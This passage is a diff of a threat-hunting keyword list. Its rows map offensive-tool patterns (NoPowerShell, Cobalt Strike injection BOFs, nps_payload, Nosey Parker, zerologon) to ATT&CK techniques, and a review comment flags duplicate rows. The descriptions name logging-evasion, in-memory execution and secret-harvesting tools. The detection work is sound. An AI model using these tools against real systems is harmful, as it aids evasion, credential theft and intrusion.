-"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - 
Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - 
Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell/*.cs*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - 
Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell_trunk.zip*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell32.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell64.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*normal/randomized.profile*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*northdata-get-company-names *","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*noseyparker report --datastore *","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" 
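Review bot: The rows re-added in this hunk still carry each NoPowerShell keyword twice with conflicting metadata: `*NoPowerShell.cna*` and `*NoPowerShell.dll*` appear once with `metadata_tool` "C2 related tools" and category "C2" and once with "nopowershell" and "Defense Evasion", and `*nopowershell.exe*` / `*NoPowerShell.exe*` differ only in letter case (the same pairing recurs for `*nps whoami*` in the next hunk). A consumer that keys rules on `keyword` will either raise two alerts per event or keep whichever row loads last, so the techniques and category attached to a hit depend on load order; whether matching is case-insensitive is not visible here, but if it is, the `.exe` pair is a further duplicate. I would merge each pair into one row, or at least mark the secondary row in `metadata_comment`, for example `"duplicate keyword - see nopowershell row"`. The "nopowershell" rows also list `T1086` and `T1500`, which ATT&CK has deprecated in favour of `T1059.001` and `T1027.004`; updating them in the same refresh that touches the star counts would keep the mapping resolvable in current ATT&CK tooling.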
@@ -14161,25 +14324,25 @@ "*noseyparker-v*-universal-macos*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*noseyparker-v*-x86_64-unknown-linux-gnu*","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1169","56","2023-09-25T21:13:22Z","2022-11-08T23:09:17Z" "*Nosql-Exploitation-Framework*","offensive_tool_keyword","Nosql-Exploitation-Framework","A FrameWork For NoSQL Scanning and Exploitation Framework","T1210 - T1211 - T1021 - T1059","TA0002 - TA0011 - TA0003","N/A","N/A","Frameworks","https://github.com/torque59/Nosql-Exploitation-Framework","1","1","N/A","N/A","6","594","158","2023-09-26T11:50:30Z","2013-12-26T17:46:11Z" -"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2532","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" +"*NoSQLMap*","offensive_tool_keyword","NoSQLMap","Automated NoSQL database enumeration and web application exploitation tool.","T1190 - T1210 - T1506","TA0002 - TA0007 - TA0040","N/A","N/A","Frameworks","https://github.com/codingo/NoSQLMap","1","0","N/A","N/A","10","2534","568","2023-09-29T03:29:49Z","2013-09-24T15:01:30Z" "*notepad FUZZ*","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries 
and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","N/A","1","54","7","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*notredamecheatstowin>*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*novelbfh.zip*","offensive_tool_keyword","novelbfh","Brute force Novell hacking tool -- Circa 1993","T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/classic_hacking_tools","1","1","N/A","N/A","1","2","0","2023-04-16T02:15:42Z","2023-04-16T01:49:12Z" "*--noWAIT --noFUNC --donut --rehash n --silent -o /tmp/*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*nping *","offensive_tool_keyword","nping","Nping is an open source tool for network packet generation. response analysis and response time measurement. Nping can generate network packets for a wide range of protocols. allowing users full control over protocol headers. While Nping can be used as a simple ping utility to detect active hosts. it can also be used as a raw packet generator for network stack stress testing. ARP poisoning. Denial of Service attacks. route tracing. etc. Npings novel echo mode lets users see how packets change in transit between the source and destination hosts. Thats a great way to understand firewall rules. detect packet corruption. 
and more","T1040 - T1043 - T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://nmap.org/nping/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps whoami*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nps whoami*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" "*nps_payload*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance. It utilizes publicly demonstrated techniques from several different sources.","T1059.007 - T1218.001 - T1027.002","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/trustedsec/nps_payload","1","1","N/A","N/A","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nps_payload.py*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nps_payload-master*","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","421","130","2017-08-08T14:12:48Z","2017-07-23T17:01:19Z" "*nrf24-scanner.py -l -v*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*nrpc.py*","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - 
T1072","TA0008","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","0","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*nselib/data/passwords.lst*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*ntcreatethread.x64*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 